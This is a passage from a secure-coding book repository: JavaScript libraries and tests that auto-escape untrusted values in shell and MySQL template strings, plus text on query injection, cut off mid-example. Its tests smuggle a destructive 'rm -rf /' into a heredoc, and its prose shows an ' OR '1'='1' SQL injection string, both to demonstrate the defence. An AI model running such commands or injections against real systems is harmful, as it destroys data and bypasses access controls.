 * Composes an ShFragment whose content consists of staticStrings
 * interleaved with the untrusted values, each escaped for its context.
 */
function composeShellString ({ contexts, raw }, staticStrings, untrusted) {
  const trusted = raw
  // A buffer onto which we accumulate output.
  const buf = [ trusted[0] ]
  let [ currentContext ] = contexts
  for (let i = 0, len = untrusted.length; i < len; ++i) {
    const newContext = contexts[i + 1]
    const value = untrusted[i]
    let [ delim ] = currentContext
    if (delim[0] === '<') {
      delim = '<<'
    }
    const embedder = DELIMS[delim].embed
    const chunk = trusted[i + 1]
    buf.push(embedder(value, buf, currentContext), chunk)
    if (currentContext !== newContext &&
        delim[0] === '<' && delim[1] === '<') {
      fixupHeredoc(buf, currentContext, newContext)
    }
    currentContext = newContext
  }

  return new ShFragment(buf.join(''))
}

/**
 * Double checks that dynamic content interpolated into a heredoc
 * string does not include the end word.
 * <p>
 * If it does, rewrites content on the buffer to use non-conflicting
 * start and end words.
 * <p>
 * If this function fails to avoid a collision, it throws an exception,
 * but that should not happen unless an attacker can generate SHA-256
 * hash collisions.
 */
function fixupHeredoc (buf, heredocContext) {
  const [ delim, contextStart, contextOffset, delimLength ] = heredocContext
  let chunkLeft = 0
  let startChunkIndex = -1
  for (let i = 0, len = buf.length; i < len; ++i) {
    chunkLeft += buf[i].length
    if (chunkLeft >= contextStart) {
      startChunkIndex = i
      break
    }
  }
  if (startChunkIndex < 0) {
    throw fail`Cannot find heredoc start for ${heredocContext}`
  }
  const label = heredocLabel(delim)
  const endChunkIndex = buf.length - 1

  // Figure out how much of the last chunk is part of the body.
  const bodyRe = heredocBodyRegExp(label)
  const endChunk = buf[endChunkIndex]
  const lastBodyMatch = bodyRe.exec(endChunk)
  if (lastBodyMatch[0].length === endChunk.length) {
    throw fail`Could not find end of ${delim}`
  }

  const startChunk = buf[startChunkIndex]
  let body = startChunk.substring(contextOffset + delimLength)
  for (let i = startChunkIndex + 1; i < endChunkIndex; ++i) {
    body += buf[i]
  }
  body += lastBodyMatch[0]

  // Look for a premature end delimiter by looking at newline followed by body.
  const testBody = `\n${body}`
  if (bodyRe.exec(testBody)[0].length !== testBody.length) {
    // There is an embedded delimiter.
    // Choose a suffix that an attacker cannot predict.
    // An attacker would need to be able to generate sha256
    // collisions to embed both NL <label> and NL <label> <suffix>.
    let suffix = '_'
    suffix += crypto.createHash('sha256')
      .update(body, 'utf8')
      .digest('base64')
      .replace(/[=]+$/, '')
    const newLabel = label + suffix
    const newBodyRe = heredocBodyRegExp(newLabel)
    if (newBodyRe.exec(testBody)[0].length !== testBody.length) {
      throw fail`Cannot solve embedding hazard in ${body} in heredoc with ${label} due to hash collision`
    }

    const endDelimEndOffset = lastBodyMatch[0].length +
        endChunk.substring(lastBodyMatch[0].length)
          // If the \w+ part below changes, also change the \w+ in the lexer
          // after the check for << and <<- start delimiters.
          .match(/[\r\n]\w+/)[0].length
    const before = startChunk.substring(0, contextOffset + delimLength)
      .replace(/[\r\n]+$/, '')
    const after = startChunk.substring(contextOffset + delimLength)
    buf[startChunkIndex] = `${before}${suffix}\n${after}`
    buf[endChunkIndex] = (
      endChunk.substring(0, endDelimEndOffset) +
        suffix +
        endChunk.substring(endDelimEndOffset))
  }
}

const shTagFunction = memoizedTagFunction(
  computeShellContexts,
  composeShellString)

exports.sh = shTagFunction
exports.bash = shTagFunction
exports.ShFragment = ShFragment

if (global.it) {
  // Expose for testing.
  // Harmless if this leaks
  exports.makeLexer = makeLexer
}


================================================
FILE: chapter-7/examples/sh/package.json
================================================
{
  "name": "sh-template-tag",
  "description": "string template tags for safely composing shell strings",
  "keywords": [
    "shell",
    "child_process",
    "security",
    "injection",
    "template",
    "template-tag",
    "string-template",
    "sec-roadmap",
    "es6"
  ],
  "version": "0.0.0",
  "author": "Mike Samuel",
  "license": "Apache-2.0",
  "main": "index.js",
  "files": [
    "index.js"
  ],
  "dependencies": {
    "template-tag-common": ">=1.0.2"
  },
  "devDependencies": {
    "chai": ">=4.1.2",
    "eslint": ">=4.15.0",
    "eslint-config-strict": "*",
    "eslint-config-standard": "*",
    "mocha": ">=4.0.1",
    "standard": "*"
  },
  "scripts": {
    "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && ./node_modules/.bin/mocha"
  },
  "eslintConfig": {
    "extends": [
      "strict",
      "standard"
    ]
  }
}


================================================
FILE: chapter-7/examples/sh/test/test.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/* eslint "id-length": off */

const { expect } = require('chai')
const { describe, it } = require('mocha')
const { sh, ShFragment, makeLexer } = require('../index')

/**
 * Feeds chunks to the lexer and concatenates contexts.
 * Tests that the lexer ends in a valid end state and
 * appends '_ERR_' as an end state if not.
 */
function tokens (...chunks) {
  const lexer = makeLexer()
  const out = []
  for (let i = 0, len = chunks.length; i < len; ++i) {
    out.push(lexer(chunks[i])[0] || '_')
  }
  try {
    lexer(null)
  } catch (exc) {
    out.push('_ERR_')
  }
  return out.join(',')
}

// Unwrap an ShFragment, failing if the result is not one.
function unwrap (x) {
  if (x instanceof ShFragment) {
    return String(x)
  }
  throw new Error(`Expected ShFragment not ${JSON.stringify(x)}`)
}

// Run a test multiple times to exercise the memoizing code.
function runShTest (golden, test) {
  for (let i = 3; --i >= 0;) {
    if (golden === '_ERR_') {
      expect(test).to.throw()
    } else {
      expect(unwrap(test())).to.equal(golden)
    }
  }
}

describe('sh template tags', () => {
  describe('lexer', () => {
    it('empty string', () => {
      expect(tokens('')).to.equal('_')
    })
    it('word', () => {
      expect(tokens('foo')).to.equal('_')
    })
    it('words', () => {
      expect(tokens('foo bar baz')).to.equal('_')
    })
    it('words split', () => {
      expect(tokens('foo bar', ' ', 'baz')).to.equal('_,_,_')
    })
    it('parens', () => {
      expect(tokens('foo (bar) baz')).to.equal('_')
    })
    it('parens split', () => {
      expect('_,_,(,_,_,_').to.equal(
        tokens('foo', ', ', '(bar', ')', ' ', 'baz'))
    })
    it('parens hanging split', () => {
      expect('_,_,(,(,(,_ERR_').to.equal(
        tokens('foo', ', ', '(bar', ' ', 'baz'))
    })
    it('quotes embed subshell', () => {
      expect('",$(,_').to.equal(
        tokens(' "foo', '$(bar ', ' baz)" boo'))
    })
    it('quotes embed arithshell', () => {
      expect('",$((,$((,",_').to.equal(
        tokens(' "foo', '$((bar ', '(far)', ' baz))', 'q" boo'))
    })
    it('quotes embed backticks', () => {
      expect('",`,`,",_').to.equal(
        tokens(' "foo', '`bar ', '(far)', ' baz`', 'q" boo'))
    })
    it('escape affects subshell', () => {
      expect('",",",",_').to.equal(
        tokens(' "foo', '\\$((bar ', '(far)', ' baz))', 'q" boo'))
    })
    it('single quotes do not embed', () => {
      expect(`',',',',_`).to.equal(
        tokens(
          ' \' $(',
          'foo) $((',
          'bar))',
          ' `',
          ' ` # \' '))
    })
    it('unterminated comment', () => {
      expect('#,_ERR_').to.equal(
        tokens(' #foo'))
    })
    it('terminated comment', () => {
      expect('_').to.equal(
        tokens(' #foo\n'))
    })
    it('terminated comment split', () => {
      expect('#,_').to.equal(
        tokens(' #foo', 'bar\n'))
    })
    it('arithshell', () => {
      expect('_,$((,$((,_,_').to.equal(
        tokens('foo', ' $((bar ', '(far)', ' baz))', ' boo'))
    })
    it('backticks', () => {
      expect('_,`,`,_,_').to.equal(
        tokens('foo', '`bar ', '(far)', ' baz`', ' boo'))
    })
    it('subshell paren disambiguation', () => {
      expect('$(,(,$(,",_,_').to.equal(tokens(
        'echo "$(foo ', ' | (bar ', ' baz)', ' boo)', 'far" | ', ''))
    })
    it('hash not after space', () => {
      expect('_,_').to.equal(
        tokens('echo foo#', ''))
    })
    it('hash after space', () => {
      expect('#,#,_ERR_').to.equal(
        tokens('echo foo #', ''))
    })
    it('hash concatenation hazard', () => {
      expect(() => tokens('#foo')).to.throw()
    })
    it('intermediate concatenation hazard', () => {
      expect(() => tokens('echo foo', '#bar')).to.throw()
    })
    it('escaped intermediate concatenation hazard', () => {
      expect('_,_').to.equal(tokens(
        'echo foo', '\\#bar'))
    })
    it('simple heredoc', () => {
      expect(tokens('cat <<EOF\nFoo bar\nEOF\n')).to.equal('_')
    })
    it('heredoc hazard', () => {
      // Concatenation hazard when no eol at end
      expect(tokens('cat <<EOF\nFoo bar\nEOF')).to.equal('<<EOF,_ERR_')
    })
    it('split heredoc', () => {
      expect(tokens('cat <<EOF\nFoo', ' bar\nEOF\n')).to.equal('<<EOF,_')
    })
    it('split heredoc sp', () => {
      expect(tokens('cat << EOF\nFoo', ' bar\nEOF\n')).to.equal('<<EOF,_')
    })
    it('split heredoc-', () => {
      expect(tokens('cat <<-EOF\nFoo', ' bar\nEOF\n')).to.equal('<<-EOF,_')
    })
    it('bad heredoc label', () => {
      expect(() => tokens('cat << "EOF"\nFoo bar\nEOF;')).to.throw()
    })
    it('missing heredoc label', () => {
      expect(() => tokens('cat <<', '\nfoo bar\n', ';')).to.throw()
    })
  })

  const str = 'a"\'\n\\$b'
  const numb = 1234
  const frag = new ShFragment(' frag ')
  describe('template tag', () => {
    it('string in top level', () => {
      runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo ${str}`)
    })
    it('number in top level', () => {
      runShTest(`echo '1234'`, () => sh`echo ${numb}`)
    })
    it('fragment in top level', () => {
      runShTest(`echo  frag `, () => sh`echo ${frag}`)
    })
    it('string in dq', () => {
      runShTest(`echo "a\\"'\n\\\\\\$b"`, () => sh`echo "${str}"`)
    })
    it('number in dq', () => {
      runShTest(`echo "1234"`, () => sh`echo "${numb}"`)
    })
    it('fragment in dq', () => {
      runShTest(`echo " frag "`, () => sh`echo "${frag}"`)
    })
    it('string in sq', () => {
      runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo '${str}'`)
    })
    it('number in sq', () => {
      runShTest(`echo '1234'`, () => sh`echo '${numb}'`)
    })
    it('fragment in sq', () => {
      runShTest(`echo ' frag '`, () => sh`echo '${frag}'`)
    })
    it('string in embed', () => {
      runShTest(
        `echo $(echo 'a"'"'"'\n\\$b')`,
        () => sh`echo $(echo ${str})`)
    })
    it('number in embed', () => {
      runShTest(
        `echo $(echo '1234')`,
        () => sh`echo $(echo ${numb})`)
    })
    it('fragment in embed', () => {
      runShTest(
        `echo $(echo  frag )`,
        () => sh`echo $(echo ${frag})`)
    })
    it('hash ambig string', () => {
      runShTest(`_ERR_`, () => sh`echo foo${str}#bar`)
    })
    it('hash ambig fragment', () => {
      runShTest(`_ERR_`, () => sh`echo foo${frag}#bar`)
    })
    it('heredoc string', () => {
      runShTest(
        '\ncat <<EOF\na"\'\n\\$b\nEOF\n',
        () => sh`
cat <<EOF
${str}
EOF
`)
    })
    it('heredoc number', () => {
      runShTest(
        '\ncat <<EOF\n1234\nEOF\n',
        () => sh`
cat <<EOF
${numb}
EOF
`)
    })
    it('heredoc fragment', () => {
      runShTest(
        '\ncat <<EOF\n frag \nEOF\n',
        () => sh`
cat <<EOF
${frag}
EOF
`)
    })
    it('heredoc sneaky', () => {
      runShTest(
        `
cat <<EOF_ZQHNfpzxDMLfdgCg8NUgxceUCSQiISNU1zQuqzI6uzs
EOF
rm -rf /
cat <<EOF
EOF_ZQHNfpzxDMLfdgCg8NUgxceUCSQiISNU1zQuqzI6uzs
`,

        () => sh`
cat <<EOF
${'EOF\nrm -rf /\ncat <<EOF'}
EOF
`)
    })
  })
})


================================================
FILE: chapter-7/examples/sql/index.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

const mysql = require('mysql')
const {
  memoizedTagFunction,
  trimCommonWhitespaceFromLines,
  TypedString
} = require('template-tag-common')

// A simple lexer for SQL.
// SQL has many divergent dialects with subtly different
// conventions for string escaping and comments.
// This just attempts to roughly tokenize MySQL's specific variant.
// See also
// https://www.w3.org/2005/05/22-SPARQL-MySQL/sql_yacc
// https://github.com/twitter/mysql/blob/master/sql/sql_lex.cc
// https://dev.mysql.com/doc/refman/5.7/en/string-literals.html

// "--" followed by whitespace starts a line comment
// "#" starts a line comment
// "/*" starts an inline comment ended at first "*/"
// \N means null
// Prefixed strings: x'...' is a hex string, b'...' is a binary string, ...
// '...', "..." are strings.  `...` escapes identifiers.
// doubled delimiters and backslash both escape
// doubled delimiters work in `...` identifiers

const PREFIX_BEFORE_DELIMITER = new RegExp(
  '^(?:' +
    (
      // Comment
      '--(?=[\\t\\r\\n ])[^\\r\\n]*' +
      '|#[^\\r\\n]*' +
      '|/[*][\\s\\S]*?[*]/'
    ) +
    '|' +
    (
      // Run of non-comment non-string starts
      '(?:[^\'"`\\-/#]|-(?!-)|/(?![*]))'
    ) +
    ')*')
const DELIMITED_BODIES = {
  '\'': /^(?:[^'\\]|\\[\s\S]|'')*/,
  '"': /^(?:[^"\\]|\\[\s\S]|"")*/,
  '`': /^(?:[^`\\]|\\[\s\S]|``)*/
}

/** Template tag that builds an error message, JSON-encoding each value. */
function msg (strs, ...dyn) {
  let message = String(strs[0])
  for (let i = 0; i < dyn.length; ++i) {
    message += JSON.stringify(dyn[i]) + strs[i + 1]
  }
  return message
}

/**
 * Returns a function that can be fed chunks of input and which
 * returns a delimiter context.
 */
function makeLexer () {
  let errorMessage = null
  let delimiter = null
  return (text) => {
    if (errorMessage) {
      // Replay the error message if we've already failed.
      throw new Error(errorMessage)
    }
    text = String(text)
    while (text) {
      const pattern = delimiter
        ? DELIMITED_BODIES[delimiter]
        : PREFIX_BEFORE_DELIMITER
      const match = pattern.exec(text)
      if (!match) {
        throw new Error(
          errorMessage = msg`Failed to lex starting at ${text}`)
      }
      let nConsumed = match[0].length
      if (text.length > nConsumed) {
        const chr = text.charAt(nConsumed)
        if (delimiter) {
          if (chr === delimiter) {
            delimiter = null
            ++nConsumed
          } else {
            throw new Error(
              errorMessage = msg`Expected ${chr} at ${text}`)
          }
        } else if (Object.hasOwnProperty.call(DELIMITED_BODIES, chr)) {
          delimiter = chr
          ++nConsumed
        } else {
          throw new Error(
            errorMessage = msg`Expected delimiter at ${text}`)
        }
      }
      text = text.substring(nConsumed)
    }
    return delimiter
  }
}

/** A string wrapper that marks its content as a SQL identifier. */
class Identifier extends TypedString {}

/**
 * A string wrapper that marks its content as a series of
 * well-formed SQL tokens.
 */
class SqlFragment extends TypedString {}

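/**
 * Analyzes the static parts of the tag content.
 *
 * @return A record like { raw, delimiters, chunks }
 *     where raw is the whitespace-trimmed raw text, each delimiter is
 *     the quoting context (a quote character or null) at the end of the
 *     corresponding chunk, and each chunk is the adjusted raw text.
 */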
function computeStatic (strings) {
  const { raw } = trimCommonWhitespaceFromLines(strings)

  const delimiters = []
  const chunks = []

  const lexer = makeLexer()

  let delimiter = null
  for (let i = 0, len = raw.length; i < len; ++i) {
    let chunk = String(raw[i])
    if (delimiter === '`') {
      // Treat raw \` in an identifier literal as an ending delimiter.
      chunk = chunk.replace(/^([^\\`]|\\[\s\S])*\\`/, '$1`')
    }
    const newDelimiter = lexer(chunk)
    if (newDelimiter === '`' && !delimiter) {
      // Treat literal \` outside a string context as starting an
      // identifier literal
      chunk = chunk.replace(
        /((?:^|[^\\])(?:\\\\)*)\\(`(?:[^`\\]|\\[\s\S])*)$/, '$1$2')
    }

    chunks.push(chunk)
    delimiters.push(newDelimiter)
    delimiter = newDelimiter
  }

  if (delimiter) {
    throw new Error(`Unclosed quoted string: ${delimiter}`)
  }

  return { raw, delimiters, chunks }
}

function interpolateSqlIntoFragment (
  { raw, delimiters, chunks }, strings, values) {
  // A buffer to accumulate output.
  let [ result ] = chunks
  for (let i = 1, len = raw.length; i < len; ++i) {
    const chunk = chunks[i]
    // The count of values must be 1 less than the surrounding
    // chunks of literal text.
    if (i !== 0) {
      const delimiter = delimiters[i - 1]
      const value = values[i - 1]
      if (delimiter) {
        result += escapeDelimitedValue(value, delimiter)
      } else {
        result = appendValue(result, value, chunk)
      }
    }

    result += chunk
  }

  return new SqlFragment(result)
}

function escapeDelimitedValue (value, delimiter) {
  if (delimiter === '`') {
    return mysql.escapeId(String(value)).replace(/^`|`$/g, '')
  }
  const escaped = mysql.escape(String(value))
  return escaped.substring(1, escaped.length - 1)
}

function appendValue (resultBefore, value, chunk) {
  let needsSpace = false
  let result = resultBefore
  const valueArray = Array.isArray(value) ? value : [ value ]
  for (let i = 0, nValues = valueArray.length; i < nValues; ++i) {
    if (i) {
      result += ', '
    }

    const one = valueArray[i]
    let valueStr = null
    if (one instanceof SqlFragment) {
      if (!/(?:^|[\n\r\t ,\x28])$/.test(result)) {
        result += ' '
      }
      valueStr = one.toString()
      needsSpace = i + 1 === nValues
    } else if (one instanceof Identifier) {
      valueStr = mysql.escapeId(one.toString())
    } else {
      // If we need to handle nested arrays, we would recurse here.
      valueStr = mysql.format('?', one)
    }
    result += valueStr
  }

  if (needsSpace && chunk && !/^[\n\r\t ,\x29]/.test(chunk)) {
    result += ' '
  }

  return result
}

/**
 * Template tag function that contextually autoescapes values
 * producing a SqlFragment.
 */
const sql = memoizedTagFunction(computeStatic, interpolateSqlIntoFragment)

exports.Identifier = Identifier
exports.SqlFragment = SqlFragment
exports.sql = sql

if (global.it) {
  // Expose for testing.
  // Harmless if this leaks
  exports.makeLexer = makeLexer
}


================================================
FILE: chapter-7/examples/sql/package.json
================================================
{
  "name": "mysql-template-tag",
  "description": "string template tags for safely composing SQL",
  "keywords": [
    "sql",
    "security",
    "injection",
    "template",
    "template-tag",
    "string-template",
    "sec-roadmap",
    "es6"
  ],
  "version": "0.0.0",
  "author": "Mike Samuel",
  "license": "Apache-2.0",
  "main": "index.js",
  "files": [
    "index.js"
  ],
  "dependencies": {
    "mysql": "2.15.0",
    "template-tag-common": ">=1.0.2"
  },
  "devDependencies": {
    "chai": ">=4.1.2",
    "eslint": ">=4.15.0",
    "eslint-config-strict": "*",
    "eslint-config-standard": "*",
    "mocha": ">=4.0.1",
    "standard": "*"
  },
  "scripts": {
    "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && TZ=GMT ./node_modules/.bin/mocha"
  },
  "eslintConfig": {
    "extends": [
      "strict",
      "standard"
    ]
  }
}


================================================
FILE: chapter-7/examples/sql/test/test.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/* eslint "no-magic-numbers": off */

const { expect } = require('chai')
const { describe, it } = require('mocha')
const index = require('../index')

function tokens (...chunks) {
  const lexer = index.makeLexer()
  const out = []
  for (let i = 0, len = chunks.length; i < len; ++i) {
    out.push(lexer(chunks[i]) || '_')
  }
  return out.join(',')
}

describe('sql template tags', () => {
  describe('lexer', () => {
    it('empty string', () => {
      expect(tokens('')).to.equal('_')
    })
    it('hash comments', () => {
      expect(tokens(' # "foo\n', '')).to.equal('_,_')
    })
    it('dash comments', () => {
      expect(tokens(' -- \'foo\n', '')).to.equal('_,_')
    })
    it('block comments', () => {
      expect(tokens(' /* `foo */', '')).to.equal('_,_')
    })
    it('dq', () => {
      expect(tokens('SELECT "foo"')).to.equal('_')
      expect(tokens('SELECT `foo`, "foo"')).to.equal('_')
      expect(tokens('SELECT "', '"')).to.equal('",_')
      expect(tokens('SELECT "x', '"')).to.equal('",_')
      expect(tokens('SELECT "\'', '"')).to.equal('",_')
      expect(tokens('SELECT "`', '"')).to.equal('",_')
      expect(tokens('SELECT """', '"')).to.equal('",_')
      expect(tokens('SELECT "\\"', '"')).to.equal('",_')
    })
    it('sq', () => {
      expect(tokens('SELECT \'foo\'')).to.equal('_')
      expect(tokens('SELECT `foo`, \'foo\'')).to.equal('_')
      expect(tokens('SELECT \'', '\'')).to.equal('\',_')
      expect(tokens('SELECT \'x', '\'')).to.equal('\',_')
      expect(tokens('SELECT \'"', '\'')).to.equal('\',_')
      expect(tokens('SELECT \'`', '\'')).to.equal('\',_')
      expect(tokens('SELECT \'\'\'', '\'')).to.equal('\',_')
      expect(tokens('SELECT \'\\\'', '\'')).to.equal('\',_')
    })
    it('bq', () => {
      expect(tokens('SELECT `foo`')).to.equal('_')
      expect(tokens('SELECT "foo", `foo`')).to.equal('_')
      expect(tokens('SELECT `', '`')).to.equal('`,_')
      expect(tokens('SELECT `x', '`')).to.equal('`,_')
      expect(tokens('SELECT `\'', '`')).to.equal('`,_')
      expect(tokens('SELECT `"', '`')).to.equal('`,_')
      expect(tokens('SELECT ```', '`')).to.equal('`,_')
      expect(tokens('SELECT `\\`', '`')).to.equal('`,_')
    })
  })

  function runTagTest (golden, test) {
    // Run several times to catch memoization bugs.
    for (let i = 3; --i >= 0;) {
      let result = test()
      if (result instanceof index.SqlFragment) {
        result = result.toString()
      } else {
        throw new Error(`Expected SqlFragment not ${result}`)
      }
      expect(result).to.equal(golden)
    }
  }

  describe('sql', () => {
    it('numbers', () => {
      runTagTest(
        'SELECT 2',
        () => index.sql`SELECT ${1 + 1}`)
    })
    it('date', () => {
      runTagTest(
        `SELECT '2000-01-01 00:00:00.000'`,
        () => index.sql`SELECT ${new Date(Date.UTC(2000, 0, 1, 0, 0, 0))}`)
    })
    it('string', () => {
      runTagTest(
        `SELECT 'Hello, World!\\n'`,
        () => index.sql`SELECT ${'Hello, World!\n'}`)
    })
    it('identifier', () => {
      runTagTest(
        'SELECT `foo`',
        () => index.sql`SELECT ${new index.Identifier('foo')}`)
    })
    it('fragment', () => {
      const fragment = new index.SqlFragment('1 + 1')
      runTagTest(
        `SELECT 1 + 1`,
        () => index.sql`SELECT ${fragment}`)
    })
    it('fragment no token merging', () => {
      const fragment = new index.SqlFragment('1 + 1')
      runTagTest(
        `SELECT 1 + 1 FROM T`,
        () => index.sql`SELECT${fragment}FROM T`)
    })
    it('string in dq string', () => {
      runTagTest(
        `SELECT "Hello, World!\\n"`,
        () => index.sql`SELECT "Hello, ${'World!'}\n"`)
    })
    it('string in sq string', () => {
      runTagTest(
        `SELECT 'Hello, World!\\n'`,
        () => index.sql`SELECT 'Hello, ${'World!'}\n'`)
    })
    it('string after string in string', () => {
      // The following tests check obliquely that '?' is not
      // interpreted as a prepared statement meta-character
      // internally.
      runTagTest(
        `SELECT 'Hello', "World?"`,
        () => index.sql`SELECT '${'Hello'}', "World?"`)
    })
    it('string before string in string', () => {
      runTagTest(
        `SELECT 'Hello?', 'World?'`,
        () => index.sql`SELECT 'Hello?', '${'World?'}'`)
    })
    it('number after string in string', () => {
      runTagTest(
        `SELECT 'Hello?', 123`,
        () => index.sql`SELECT '${'Hello?'}', ${123}`)
    })
    it('number before string in string', () => {
      runTagTest(
        `SELECT 123, 'World?'`,
        () => index.sql`SELECT ${123}, '${'World?'}'`)
    })
    it('string in identifier', () => {
      runTagTest(
        'SELECT `foo`',
        () => index.sql`SELECT \`${'foo'}\``)
    })
    it('number in identifier', () => {
      runTagTest(
        'SELECT `foo_123`',
        () => index.sql`SELECT \`foo_${123}\``)
    })
    it('array', () => {
      const id = new index.Identifier('foo')
      const frag = new index.SqlFragment('1 + 1')
      const values = [ 123, 'foo', id, frag ]
      runTagTest(
        "SELECT X FROM T WHERE X IN (123, 'foo', `foo`, 1 + 1)",
        () => index.sql`SELECT X FROM T WHERE X IN (${values})`)
    })
  })
})


================================================
FILE: chapter-7/libraries.md
================================================
# Library support for Safe Coding Practices

The way we structure libraries and APIs affects the idioms that are
available to developers.

If the easiest ways to express ideas are also secure against a
particular class of attack, then developers who have seen ideas
expressed those ways will tend to produce code that is secure
against that class of attack.

Next, we introduce a few such idioms, show how a rarely used but
powerful JavaScript feature can make them better, and end with some
ideas on how to foster consistent, powerful, and secure APIs for a
class of problems that often have security consequences: composing
structured strings to send to external agents.


================================================
FILE: chapter-7/query-langs.md
================================================
# Query injection

Threats: [QUI][]

One piece of simple advice to avoid [query injection attacks][QUI] is
"just use [prepared statements][]."

This is good advice, and the [`mysql`][] library has a
solid, well-documented API for producing secure prepared statements.

Developers could do

```js
const mysql = require('mysql');
// ... create `connection`, e.g. with mysql.createConnection(...)
connection.query(
    'SELECT * FROM T WHERE x = ? AND y = ? AND z = ?',
    [                          x,        y,        z],
    callback);
```

which is secure since `.query` calls `mysql.format` under the hood
to escape `x`, `y`, and `z`.  Enough developers still do

```js
connection.query(
    "SELECT * FROM T WHERE x = '" + x + "' AND y = '" + y + "' AND z = '" + z + "'",
    callback);
```

to make query injection a real problem.
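To see why, here is a minimal sketch that builds a query by concatenation in the style of the snippet above, with `AND` joining the conditions. `concatQuery` is a hypothetical helper; no database is involved, we only print the resulting strings:

```js
// Hypothetical helper that builds the query by string concatenation.
function concatQuery (x, y, z) {
  return "SELECT * FROM T WHERE x = '" + x + "' AND y = '" + y +
    "' AND z = '" + z + "'"
}

// Benign input: the query has the shape the author intended.
console.log(concatQuery('a', 'b', 'c'))
// SELECT * FROM T WHERE x = 'a' AND y = 'b' AND z = 'c'

// Crafted input: the quote in x ends the string literal early, and the
// trailing "-- " starts a MySQL comment that swallows the rest.
console.log(concatQuery("' OR '1'='1' -- ", 'b', 'c'))
// SELECT * FROM T WHERE x = '' OR '1'='1' -- ' AND y = 'b' AND z = 'c'
```

The second query's `WHERE` clause is true for every row, regardless of `y` and `z`.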


Some developers may not know about prepared statements, and even for
those who do, prepared statements have other problems:

*  They rely on a **correspondence between positional parameters**
   and the `?` placeholders that they fill.  When a prepared statement
   has more substitutions than fit in a reader's working memory, the
   reader has to look back and forth between the prepared statement and
   the parameter list.
*  Prepared statements do not make it easy to **compose a query** from
   simpler query fragments.  It's not easy to compute the `WHERE`
   clause separately from the result column set and then combine the
   two into a query without resorting to string concatenation
   somewhere along the line.


## Template literals

JavaScript has a rarely used feature that lets us get the best of
both worlds.


```js
connection.query`SELECT * FROM T WHERE x = ${x} AND y = ${y} AND z = ${z}`(callback)
```

uses a [tagged template literal][] to allow inline expressions in SQL
syntax.

> A more advanced form of template literals are tagged template
> literals. Tags allow you to parse template literals with a
> function. The first argument of a tag function contains an array of
> string values. The remaining arguments are related to the
> expressions. In the end, your function can return your manipulated
> string (or it can return something completely different ...).

The code above is almost equivalent to

```js
connection.query(
    ['SELECT * FROM T WHERE x = ', ' AND y = ', ' AND z = ', ''],
    x, y, z
)(callback);
```

`connection.query` gets called with the parts of the static
template string specified by the author, followed by the results of
the expressions.  The final `(callback)` dispatches the query.
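The calling convention can be observed directly. This sketch uses a hypothetical tag, `showArgs`, that returns what it receives instead of running a query:

```js
// Hypothetical tag that reports its arguments instead of running a query.
function showArgs (strings, ...values) {
  return { strings: Array.from(strings), values }
}

const x = 1
const y = 'two'
const z = null
const seen = showArgs`SELECT * FROM T WHERE x = ${x} AND y = ${y} AND z = ${z}`
console.log(seen.strings)
// [ 'SELECT * FROM T WHERE x = ', ' AND y = ', ' AND z = ', '' ]
console.log(seen.values)
// [ 1, 'two', null ]

// The strings array also carries the unprocessed source text as `.raw`,
// is frozen, and is reused each time the same call site is evaluated,
// which lets a tag cache its analysis of the static parts.
function identity (strings) { return strings }
function evaluateSite () { return identity`SELECT ${1}` }
console.log(evaluateSite() === evaluateSite()) // true
```

That per-call-site reuse is what makes memoizing the analysis of the static parts worthwhile.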

We can tweak SQL APIs so that, when used as template literal tags,
they escape the dynamic parts to preserve the intent of the author of
the static parts, and then re-interleave them to produce the query.
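A minimal sketch of the escape-and-re-interleave idea, assuming MySQL's default string syntax in which a backslash escapes a quote (the `NO_BACKSLASH_ESCAPES` SQL mode turns that off). `toySql` and `toyEscape` are hypothetical. Unlike the chapter's example, they do not parse the static parts, so they are only correct for values that appear outside quotes:

```js
// Toy escaper, not the mysql module's: numbers as-is, null/undefined as
// NULL, everything else as a single-quoted string literal.
function toyEscape (value) {
  if (typeof value === 'number' && Number.isFinite(value)) {
    return String(value)
  }
  if (value === null || value === undefined) {
    return 'NULL'
  }
  // Backslash-escape the characters that could end the literal early.
  return "'" + String(value).replace(/[\\']/g, (c) => '\\' + c) + "'"
}

// Re-interleave the author's static text with the escaped dynamic values.
function toySql (strings, ...values) {
  let out = strings[0]
  for (let i = 0; i < values.length; ++i) {
    out += toyEscape(values[i]) + strings[i + 1]
  }
  return out
}

const attackerInput = "' OR '1'='1' -- "
console.log(toySql`SELECT * FROM T WHERE x = ${attackerInput} AND y = ${42}`)
// SELECT * FROM T WHERE x = '\' OR \'1\'=\'1\' -- ' AND y = 42
```

The attacker's quotes now stay inside one string literal, so the query keeps the structure its author wrote.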

The example ([code][sql-code]) accompanying this chapter implements
this idea by defining a `mysql.sql` function that parses the static
parts to choose appropriate escapers for the dynamic parts.
We have put together a [draft PR][mysql-PR] to integrate this into
the *mysql* module.

It also provides string wrappers, `Identifier` and `SqlFragment`, to
make it easy to compose complex queries from simpler parts:

```js
// Compose a query from two fragments.
// When the value inside ${...} is a SqlFragment, no extra escaping happens.
connection.query`
